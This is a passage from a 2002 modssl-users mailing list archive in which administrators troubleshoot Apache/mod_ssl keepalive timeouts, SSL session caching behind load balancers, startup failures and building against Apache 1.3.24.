with Internet Mail Service (5.5.2653.19) id ; Mon, 25 Mar 2002 10:22:09 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF90AB@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: RE: customers get "page cannot be displayed" when browsing secure ly Date: Mon, 25 Mar 2002 10:22:03 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/mixed; boundary="------------InterScan_NT_MIME_Boundary" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. --------------InterScan_NT_MIME_Boundary Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1D3E6.E86C3930" ------_=_NextPart_001_01C1D3E6.E86C3930 Content-Type: text/plain; charset="iso-8859-1" Look at KeepAliveTimeOut in httpd.conf Also look at Timeout and SSLCacheSessionTimeout. I think that an SSL session drops if KeepAliveTimeOut expires. Regards Mike -----Original Message----- From: Stephan Edelman [mailto:stephan@newace.ca] Sent: Monday, March 25, 2002 1:39 AM To: modssl-users@modssl.org Subject: Re: customers get "page cannot be displayed" when browsing securely Hello all, This problem has just cropped up with an upgrade of Apache and mod_ssl. When our customers are browsing our site securely and "pause" while filing in information (into an order form, for example), the Apache server closes the connection (presumably because it was a keepalive connection and it timed out), but when the customer does a submit of the orderform, a "Page cannot be displayed" message comes up. Looking into this a bit closer, the web server is indeed closing the connection, but the browser still thinks it's connected. When the user POSTs the form, a TCP connection-reset is sent back, causing the browser to display "Page cannot be displayed or DNS error" (in IE 6). Incidently, when the user takes less time to fill in the order form (i.e., before Apache closes the connection) the order form can be submitted just fine. This is what shows up in the ssl_engine_log file: [24/Mar/2002 20:23:05 22913] [info] Connection to child 7 closed with standard shutdown (server secure.newace.ca:443, client 204.92.222.5) We're running Apache/1.3.23 (Unix) PHP/3.0.18 mod_ssl/2.8.7 OpenSSL/0.9.6c, on Kernel 2.4.17 SMP. Is there a way to specify the timeout in Apache, or mod_ssl? Any suggestions? Please reply to my email and this list. Regards, Stephan. --- Stephan A. Edelman, B.Eng. NewAce Corporation http://www.newace.com Toll Free: 1-877-463-9223 x21 Tel: +1 519 336-4837 x21 Fax:+1 519 336-4046 ------_=_NextPart_001_01C1D3E6.E86C3930 Content-Type: text/html; charset="iso-8859-1"
Look at
 
KeepAliveTimeOut in httpd.conf
Also look at Timeout and SSLCacheSessionTimeout.
 
I think that an SSL session drops if KeepAliveTimeOut expires.
 
Regards
Mike
-----Original Message-----
From: Stephan Edelman [mailto:stephan@newace.ca]
Sent: Monday, March 25, 2002 1:39 AM
To: modssl-users@modssl.org
Subject: Re: customers get "page cannot be displayed" when browsing securely

Hello all,
 
This problem has just cropped up with an upgrade of Apache and mod_ssl.
 
When our customers are browsing our site securely and "pause" while filing in information (into an order form, for example), the Apache server closes the connection (presumably because it was a keepalive connection and it timed out), but when the customer does a submit of the orderform, a "Page cannot be displayed" message comes up.
 
Looking into this a bit closer, the web server is indeed closing the connection, but the browser still thinks it's connected. When the user POSTs the form, a TCP connection-reset is sent back, causing the browser to display "Page cannot be displayed or DNS error" (in IE 6).
 
Incidently, when the user takes less time to fill in the order form (i.e., before Apache closes the connection) the order form can be submitted just fine.
 
This is what shows up in the ssl_engine_log file:
 
[24/Mar/2002 20:23:05 22913] [info]  Connection to child 7 closed with standard shutdown (server secure.newace.ca:443, client 204.92.222.5)
 
We're running Apache/1.3.23 (Unix) PHP/3.0.18 mod_ssl/2.8.7 OpenSSL/0.9.6c, on Kernel 2.4.17 SMP.
 
Is there a way to specify the timeout in Apache, or mod_ssl? Any suggestions? Please reply to my email and this list.
 
Regards,
 
Stephan.
---
Stephan A. Edelman, B.Eng.
NewAce Corporation
http://www.newace.com
Toll Free: 1-877-463-9223 x21
Tel: +1 519 336-4837 x21
Fax:+1 519 336-4046
------_=_NextPart_001_01C1D3E6.E86C3930-- --------------InterScan_NT_MIME_Boundary-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 14:20:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA23635; Mon, 25 Mar 2002 14:19:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA23603; Mon, 25 Mar 2002 14:18:46 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 24B4A4CE5F1; Mon, 25 Mar 2002 14:18:46 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2PBcsr21531; Mon, 25 Mar 2002 12:38:54 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns-zero1.technologue.co.jp id LAA13533; Mon, 25 Mar 2002 11:49:40 +0100 (MET) From: yaz@technologue.jp Received: (from root@localhost) by ns-zero1.technologue.co.jp (8.11.6/8.11.3) id g2PAnd015764 for modssl-users@modssl.org; Mon, 25 Mar 2002 19:49:39 +0900 Received: from technologue.jp (10.in.technologue.jp [192.168.1.10] (may be forged)) by ns-zero1.technologue.co.jp (8.11.6/8.11.6) with ESMTP id g2PAnYU15757 for ; Mon, 25 Mar 2002 19:49:34 +0900 Message-ID: <3C9F00BF.3000300@technologue.jp> Date: Mon, 25 Mar 2002 19:49:35 +0900 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.9) Gecko/20020311 X-Accept-Language: en,ja MIME-Version: 1.0 To: modssl-users@modssl.org Subject: mod_ssl contrib Content-Type: text/plain; charset=ISO-2022-JP Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: yaz@technologue.jp X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi there, I've uploaded these RPMs: apache-mod_ssl-1.3.23.2.8.7-1tlg.i386.rpm apache-mod_ssl-devel-1.3.23.2.8.7-1tlg.i386.rpm apache-mod_ssl-manual-1.3.23.2.8.7-1tlg.i386.rpm apache-mod_ssl-1.3.23.2.8.7-1tlg.src.rpm Thank you, Yaz -- Yasushi "Yaz" FUJITA yaz@technologue.jp ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 16:33:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA01176; Mon, 25 Mar 2002 16:32:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id QAA01161; Mon, 25 Mar 2002 16:32:08 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id DAE894CE6E0; Mon, 25 Mar 2002 16:32:07 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2PFG0o26406; Mon, 25 Mar 2002 16:16:00 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from correio.unifor.br id OAA24564; Mon, 25 Mar 2002 14:42:36 +0100 (MET) Received: from paulo ([200.17.34.73]) by correio.unifor.br (8.9.3/8.9.3) with SMTP id KAA08931 for ; Mon, 25 Mar 2002 10:42:14 -0300 Message-Id: <200203251342.KAA08931@correio.unifor.br> From: "Paulo Barreto" To: modssl-users@modssl.org Date: Mon, 25 Mar 2002 10:43:33 -0300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: startssl dont working X-mailer: Pegasus Mail for Win32 (v3.01d) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Paulo Barreto" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I am using Apache/1.3.12 with mod_ssl/2.6.4 on HP-UX 11.11. When I try "apache startssl" I am asked for the "Pass Phrase Dialog", I enter a answer and the system return : Ok: Pass Phrase Dialog successful.  apachectl startssl: httpd started after this just one (1) process httpd is started and it is finished after few many seconds with no error messages on the screen (and no error messages in then logs). What do I doing wrong ? Can you help me ? Paulo Barreto / Fortaleza University / Brazil ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 18:48:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA11338; Mon, 25 Mar 2002 18:47:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls902a id SAA11284; Mon, 25 Mar 2002 18:46:46 +0100 (MET) Received: by bnls205a.sni.co.uk with Internet Mail Service (5.5.2653.19) id ; Mon, 25 Mar 2002 17:47:08 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF90B4@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: SSL Session cache and IDs Date: Mon, 25 Mar 2002 17:47:04 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Can anyone help by explaining how the session cache works? We have a web site supported by two servers using a content switch to load balance. The content switch goes sticky on SSL id. We are discovering that when two people use SSL at the same time that towards the end of the SSL session the content switch suddenly routes one session to the other machine thus causing an error because the machine doesn't know anything about the session. I have looked at the ssl_engine logs and found that it wants to give a session a new id even though the user is sending requests within the SSLCacheTimeout time. Does the time out last from the start of the session to the end or does it last from request to request? Does the browser affect what happens? I have seen discussion about nokeepalive with MSIE. Would this affect it? Any help appreciated. Mike Bray SBS UK. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 19:12:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA12799; Mon, 25 Mar 2002 19:11:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA12594; Mon, 25 Mar 2002 19:10:17 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id C2F874CE757; Mon, 25 Mar 2002 19:10:16 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2PI9jk30038; Mon, 25 Mar 2002 19:09:45 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from fep01-mail.bloor.is.net.cable.rogers.com id SAA11767; Mon, 25 Mar 2002 18:54:52 +0100 (MET) Received: from cr2320296a ([24.42.244.219]) by fep01-mail.bloor.is.net.cable.rogers.com (InterMail vM.5.01.04.06 201-253-122-122-106-20020109) with ESMTP id <20020325175445.UPBI213949.fep01-mail.bloor.is.net.cable.rogers.com@cr2320296a> for ; Mon, 25 Mar 2002 12:54:45 -0500 Message-ID: <000601c1d426$2c39dd40$dbf42a18@cr2320296a> From: "Michael Connors" To: Subject: After Install: Apache working, modssl not Date: Mon, 25 Mar 2002 12:54:55 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Authentication-Info: Submitted using SMTP AUTH LOGIN at fep01-mail.bloor.is.net.cable.rogers.com from [24.42.244.219] using ID at Mon, 25 Mar 2002 12:54:40 -0500 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Michael Connors" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have followed the installation procedures exactly for SSL. This is what I have configured in this order 1) openssl 0.9.6.c 2) mod_ssl 2.8.7 3) Apache 1.3.23 onto a Linux Mandrake 8.0 (redhat) OS. I chose NOT to install MM Shared Memory. The whole configure and install worked without any errors and the 'make certificate' went fine. When I execute '/path/to/apache/bin/apachectl startssl I get this response apachectl startssl: httpd started When I check the open listening ports (443 and/or 8443) on this same machine they are closed and the 8081 (cause my ISP blocks port 80) is open. And here is the error_log from apache logs after a start (apachectl startssl) [Mon Mar 25 12:40:24 2002] [notice] Apache/1.3.23 (Unix) mod_ssl/2.8.7 OpenSSL/0.9.6c configured -- resuming normal operations [Mon Mar 25 12:40:24 2002] [notice] Accept mutex: sysvsem (Default: sysvsem) What does this mean? Does anyone know what may be wrong? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 19:44:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA15814; Mon, 25 Mar 2002 19:43:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id TAA15778; Mon, 25 Mar 2002 19:42:51 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id B58F2BD2A; Mon, 25 Mar 2002 19:44:24 +0100 (CET) Date: Mon, 25 Mar 2002 19:44:24 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: SSL Session cache and IDs Message-ID: <20020325184424.GB1549@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <077AD8BDA52CD41197E900104B42A584EF90B4@bnls230a.sni.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <077AD8BDA52CD41197E900104B42A584EF90B4@bnls230a.sni.co.uk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Mar 25, 2002 at 05:47:04PM -0000, Bray, Mike wrote: > Can anyone help by explaining how the session cache works? We have a web > site supported by two servers using a content switch to load balance. The > content switch goes sticky on SSL id. We are discovering that when two > people use SSL at the same time that towards the end of the SSL session the > content switch suddenly routes one session to the other machine thus causing > an error because the machine doesn't know anything about the session. > > I have looked at the ssl_engine logs and found that it wants to give a > session a new id even though the user is sending requests within the > SSLCacheTimeout time. and you're absolutely sure that it is not hte client that has requested a new session? MSIE usually cuts sessions after a couple of minutes (the length varies with the browser and ssl version) > > Does the time out last from the start of the session to the end or does it > last from request to request? It should last from the start of the session until the timeout, but the client can cut it short. > Does the browser affect what happens? Ues, see above. > I have seen discussion about > nokeepalive with MSIE. Would this affect it? > I don't think so. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 20:26:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA18807; Mon, 25 Mar 2002 20:25:47 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id UAA18738; Mon, 25 Mar 2002 20:24:55 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g2PJLDN07478 for ; Mon, 25 Mar 2002 14:21:13 -0500 Date: Mon, 25 Mar 2002 14:21:12 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: SSL Session cache and IDs In-Reply-To: <20020325184424.GB1549@marvin-lnx.int.tele.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > On Mon, Mar 25, 2002 at 05:47:04PM -0000, Bray, Mike wrote: > > Can anyone help by explaining how the session cache works? We have a web > > site supported by two servers using a content switch to load balance. > > and you're absolutely sure that it is not hte client that has requested > a new session? MSIE usually cuts sessions after a couple of minutes > (the length varies with the browser and ssl version) When load balancing, if the back-end servers do not share a session cache, a client that initiates a session with one server and then gets handed off to another server will lose the session, because the client will not know it got handed off. It will present a session to the new back-end server that the new server knows nothing about, and the server will force a renegotation. > > Does the time out last from the start of the session to the end or > > does it last from request to request? > > It should last from the start of the session until the timeout, but the > client can cut it short. The server can also cut it short. This can happen in the above situation or when the session cache fills up under heavy load (for certain kinds of session caches). > > I have seen discussion about nokeepalive with MSIE. Would this affect > > it? > I don't think so. I tend to think the two most likely are related. There's less you can do about it in this case, but the same general techniques might help. What BrowserMatch settings are you currently using? How is your SessionCache set up? --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 20:59:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA20503; Mon, 25 Mar 2002 20:58:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ewok.sytrix.com id UAA20472; Mon, 25 Mar 2002 20:57:59 +0100 (MET) Received: from 226.balt.vasco.com (gateway.vasco.com [209.140.121.226]) by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g2PK3Bx01423 for ; Mon, 25 Mar 2002 15:03:11 -0500 From: "Aryeh Katz" To: modssl-users@modssl.org Received: from espanol.sytrix.com by 226.balt.vasco.com via smtpd (for [209.140.121.242]) with SMTP; 25 Mar 2002 19:57:58 UT Date: Mon, 25 Mar 2002 14:56:17 -0500 MIME-Version: 1.0 Subject: possible mod_ssl bug, please confirm Message-ID: <3C9F3A91.18910.90EFA4EF@localhost> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Aryeh Katz" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Tested with the nt 1.3.23 server, 2.8.7 mod_ssl from the contrib directory(mar 8 2002), as I just needed a quick ssl server, so I can't tell you the build params. If the wrong password is entered from the command line on startup, the server will soon fail with the following error messages: Ok: Pass Phrase Dialog successful. [Mon Mar 25 14:44:40 2002] [error] mod_ssl: Init: (----) Unable to configure verify locations for client authentication (OpenSSL library error follows) [Mon Mar 25 14:44:40 2002] [error] OpenSSL: error:0D084069:asn1 encoding routines:d2i_ASN1_SET:bad tag [Mon Mar 25 14:44:40 2002] [error] OpenSSL: error:0D09D082:asn1 encoding routines:d2i_RSAPrivateKey:parsing [Mon Mar 25 14:44:40 2002] [error] OpenSSL: error:0D09B00D:asn1 encoding routines:d2i_PrivateKey:ASN1 lib [Mon Mar 25 14:44:40 2002] [error] OpenSSL: error:0906D06C:PEM routines:PEM_read_bio:no start line [Hint: Bad file contents or format - or even just a forgotten SSLCertificateKeyFile?] [Mon Mar 25 14:44:40 2002] [error] OpenSSL: error:0B084009:x509 certificate routines:X509_load_cert_crl_file:missing asn1 eos Note the errors or messages above, and press the key to exit. 29... When the password is entered correctly the first time, the server starts up fine, and it is possible to make ssl connections to the server. --- Aryeh Katz VASCO www.vasco.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 21:01:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA20646; Mon, 25 Mar 2002 21:00:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id UAA20520; Mon, 25 Mar 2002 20:59:17 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 9D0CABD2A; Mon, 25 Mar 2002 21:00:50 +0100 (CET) Date: Mon, 25 Mar 2002 21:00:50 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: SSL Session cache and IDs Message-ID: <20020325200050.GC1549@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <20020325184424.GB1549@marvin-lnx.int.tele.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Mar 25, 2002 at 02:21:12PM -0500, Cliff Woolley wrote: > > > On Mon, Mar 25, 2002 at 05:47:04PM -0000, Bray, Mike wrote: > > > Can anyone help by explaining how the session cache works? We have a web > > > site supported by two servers using a content switch to load balance. > > > > and you're absolutely sure that it is not hte client that has requested > > a new session? MSIE usually cuts sessions after a couple of minutes > > (the length varies with the browser and ssl version) > > When load balancing, if the back-end servers do not share a session cache, > a client that initiates a session with one server and then gets handed off > to another server will lose the session, because the client will not know > it got handed off. It will present a session to the new back-end server > that the new server knows nothing about, and the server will force a > renegotation. Yep, I read his post as if they had the load balancer set up with sticky sessions - but you're probably right that it would be a good idea to test without the loadbalancer, but with the same browser. > > > > Does the time out last from the start of the session to the end or > > > does it last from request to request? > > > > It should last from the start of the session until the timeout, but the > > client can cut it short. > > The server can also cut it short. This can happen in the above situation > or when the session cache fills up under heavy load (for certain kinds of > session caches). Yup, I forgot about that. > > > > I have seen discussion about nokeepalive with MSIE. Would this affect > > > it? > > I don't think so. > > I tend to think the two most likely are related. There's less you can do > about it in this case, but the same general techniques might help. What > BrowserMatch settings are you currently using? How is your SessionCache > set up? > The defaults are nokeepalive IIRC - if that affects the session, then shouldn't it cut the session short even after the initial request? Setting SSLLogLevel to something like debug and looking for cache hits/misses would probably be a good place to start. Also testing with something like Swamp and keeping an eye out for session reuse. I did some extensive testing on IE session lengt a year or two ago, and usually they end up with something like cutting the session after 1 or 2 minutes (this changes depending on the IE version, wether client certs are used and wether it is SSLv2,3 or TLS). Testing with and without nokeepalive should be easy though. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 21:16:27 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA21513; Mon, 25 Mar 2002 21:15:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id VAA21382; Mon, 25 Mar 2002 21:14:09 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g2PKAQu07537 for ; Mon, 25 Mar 2002 15:10:26 -0500 Date: Mon, 25 Mar 2002 15:10:26 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: SSL Session cache and IDs In-Reply-To: <20020325200050.GC1549@marvin-lnx.int.tele.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 25 Mar 2002, Mads Toftum wrote: > The defaults are nokeepalive IIRC - if that affects the session, then > shouldn't it cut the session short even after the initial request? nokeepalive doesn't really imply no session caching at all... that's not exactly what I meant to say. What I was trying to say was that IE doesn't deal well with sessions in general, which is why kept-alive sessions cause even more headaches -- IE just does bad things with them. I can't be much more specific than that because I haven't studied it in depth... but I just feel like things that would make IE behave better with sessions in general might make it do the right thing the server asks for a renegotation in this case. > Setting SSLLogLevel to something like debug and looking for cache > hits/misses would probably be a good place to start. This and testing with/without load balancing both sound like a good plan... --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 21:26:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA22472; Mon, 25 Mar 2002 21:25:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA22438; Mon, 25 Mar 2002 21:24:48 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 603814CE6E0; Mon, 25 Mar 2002 21:24:46 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2PKMQl32616; Mon, 25 Mar 2002 21:22:26 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailgw.svip.net id VAA21801; Mon, 25 Mar 2002 21:17:22 +0100 (MET) Received: from Jimmy (h96n2fls24o900.telia.com [217.208.132.96]) by mailgw.svip.net (8.11.6/8.11.6) with ESMTP id g2PKAS128867 for ; Mon, 25 Mar 2002 21:10:28 +0100 Message-Id: <5.1.0.14.0.20020325210916.00b9a510@mail.lusidor.nu> X-Sender: p1064@mail.lusidor.nu X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Mon, 25 Mar 2002 21:18:41 +0100 To: modssl-users@modssl.org From: Jimmy Lantz Subject: mod_ssl for apache 1.3.24? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jimmy Lantz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Just wanted to know if there's a mod_ssl version for apache 1.3.24? Since the current version will not compile with apache 1.3.24. / Jimmy ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 21:34:35 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA23141; Mon, 25 Mar 2002 21:33:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id VAA23100; Mon, 25 Mar 2002 21:33:03 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g2PKTKi07557 for ; Mon, 25 Mar 2002 15:29:20 -0500 Date: Mon, 25 Mar 2002 15:29:20 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: mod_ssl for apache 1.3.24? In-Reply-To: <5.1.0.14.0.20020325210916.00b9a510@mail.lusidor.nu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 25 Mar 2002, Jimmy Lantz wrote: > Just wanted to know if there's a mod_ssl version for apache 1.3.24? > Since the current version will not compile with apache 1.3.24. I'm sure it's on the way soon. But if you're in a huge hurry and absolutely can't wait, you can use the --force parameter to mod_ssl's configure script. 2.8.7 *will* apply to 1.3.24 with no patching failures (some warnings, but no errors)... I know because I tried it. ;) Granted, that's the exception rather than the rule... but it does happen to work for this particular version. --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 21:41:57 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA23713; Mon, 25 Mar 2002 21:40:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id VAA23659; Mon, 25 Mar 2002 21:39:37 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g2PKZtv07561 for ; Mon, 25 Mar 2002 15:35:55 -0500 Date: Mon, 25 Mar 2002 15:35:55 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: mod_ssl for apache 1.3.24? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 25 Mar 2002, Cliff Woolley wrote: > But if you're in a huge hurry and absolutely can't wait, you can use the > --force parameter to mod_ssl's configure script. Just to be clear: this method is NOT recommended. If you can wait for the next version, I strongly urge you to do so. [In other words, --force at your own risk. :] --Cliff 